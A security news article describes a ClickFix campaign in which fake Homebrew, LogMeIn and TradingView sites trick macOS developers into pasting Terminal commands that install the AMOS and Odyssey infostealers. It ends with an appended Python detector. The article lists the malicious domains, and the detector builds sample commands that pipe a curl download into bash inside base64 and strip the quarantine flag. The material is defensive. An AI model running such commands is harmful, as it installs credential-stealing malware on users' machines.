Fake Homebrew, LogMeIn, and TradingView Sites Deliver Infostealers to macOS Developers

New Malicious Campaign Targeting macOS Developers
A recent malicious campaign targets macOS developers with fake Homebrew, LogMeIn, and TradingView sites that deliver infostealing malware such as AMOS (Atomic macOS Stealer) and Odyssey.
The campaign uses a technique known as “ClickFix,” in which targets are deceived into executing commands in Terminal that infect their own systems with malware.
Homebrew, a popular open-source package management system for macOS and Linux, has been exploited by threat actors in the past to distribute AMOS through malvertising campaigns.
LogMeIn, a remote access service, and TradingView, a financial charting and market analysis platform, are widely used by Apple users and have also been impersonated in this campaign.
Domains Impersonating Legitimate Platforms
http://homebrewclubs.org/
https://sites-phantom.com/
http://homebrewfaq.org/
https://tradingviewen.com/
Investigators found that some of these malicious domains were promoted through Google Ads, indicating that the threat actor used ads to increase their visibility in Google search results.
The fraudulent sites feature convincing download portals for the fake apps and instruct users to execute a curl command in Terminal to install them, according to researchers.
Source: Hunt.io
In the case of TradingView, the malicious commands are presented as a “connection security confirmation step.” However, clicking the ‘copy’ button delivers a base64-encoded installation command to the clipboard instead of the displayed Cloudflare verification ID.

The commands obtained from these sites fetch and decode an ‘install.sh’ file, which downloads a payload binary that bypasses Gatekeeper prompts and removes quarantine flags to allow execution.
The payload, either AMOS or Odyssey, is then executed on the host machine after verifying the environment to ensure it is not a virtual machine or an analysis system.
The malware uses sudo to run commands as root and begins by gathering detailed hardware and memory information from the host.
Subsequently, it manipulates system services, interacts with macOS XPC services, and blends its malicious activity with legitimate processes to avoid detection.
The infostealing components then activate, collecting sensitive information stored in browsers, cryptocurrency credentials, and other data, which is exfiltrated to a command and control (C2) server.
About the Malware: AMOS and Odyssey
AMOS, discovered in April 2023, is a malware-as-a-service (MaaS) available for a $1,000/month subscription. It is capable of stealing a wide range of data from infected hosts and now includes a backdoor component for remote persistent access.
Odyssey Stealer, a new family derived from Poseidon Stealer, which has roots in AMOS, targets credentials and cookies stored in browsers, cryptocurrency wallet extensions, Keychain data, and personal files. This information is then sent to attackers in ZIP format.
To avoid falling victim to such malware campaigns, users are strongly advised not to execute Terminal commands found online unless they fully understand what the commands do.
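One way to act on this advice, as an added example that is not from the original article or from Hunt.io: a Python check that unwraps base64 layers in a copied command and flags the behaviours described above (a download piped to a shell, quarantine-flag removal, sudo) before anything is run. The rule names, the sample strings and the example.invalid host are constructed for illustration.

```python
import base64
import re

# Rules for behaviours the article describes; rule names are this example's own.
RULES = {
    "download piped to a shell": re.compile(
        r"\b(curl|wget)\b[^|;&\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "decodes base64 at run time": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "deletes extended attributes (quarantine flag)": re.compile(
        r"\bxattr\b(\s+-\w+)*?\s+-\w*[dc]\w*\b"),
    "requests root": re.compile(r"\bsudo\b"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def decode_layers(text, max_depth=3):
    """Return text followed by every readable string recovered from base64 tokens."""
    layers, queue = [text], [(text, 0)]
    while queue:
        current, depth = queue.pop()
        if depth >= max_depth:
            continue
        for token in B64_TOKEN.findall(current):
            try:
                raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
                decoded = raw.decode("utf-8")
            except ValueError:  # covers binascii.Error and UnicodeDecodeError
                continue
            if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
                layers.append(decoded)
                queue.append((decoded, depth + 1))
    return layers

def inspect_command(pasted):
    """Return sorted findings for pasted text, looking inside base64 layers too."""
    findings = set()
    for index, layer in enumerate(decode_layers(pasted)):
        for name, pattern in RULES.items():
            if pattern.search(layer):
                findings.add(name if index == 0 else name + " (hidden in base64)")
    return sorted(findings)

# Constructed samples (not taken from the campaign); example.invalid is a placeholder host.
_inner = "curl -fsSL https://example.invalid/install.sh | bash"
SAMPLE_CLIPBOARD = "echo '%s' | base64 -d | bash" % base64.b64encode(_inner.encode()).decode()
SAMPLE_SCRIPT_LINE = "sudo xattr -d com.apple.quarantine ./update"

if __name__ == "__main__":
    for sample in (SAMPLE_CLIPBOARD, SAMPLE_SCRIPT_LINE, "brew install wget"):
        print(inspect_command(sample) or ["no findings"], "<-", sample[:60])
```

An empty result only means none of these four patterns matched; it does not establish that a command is safe.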
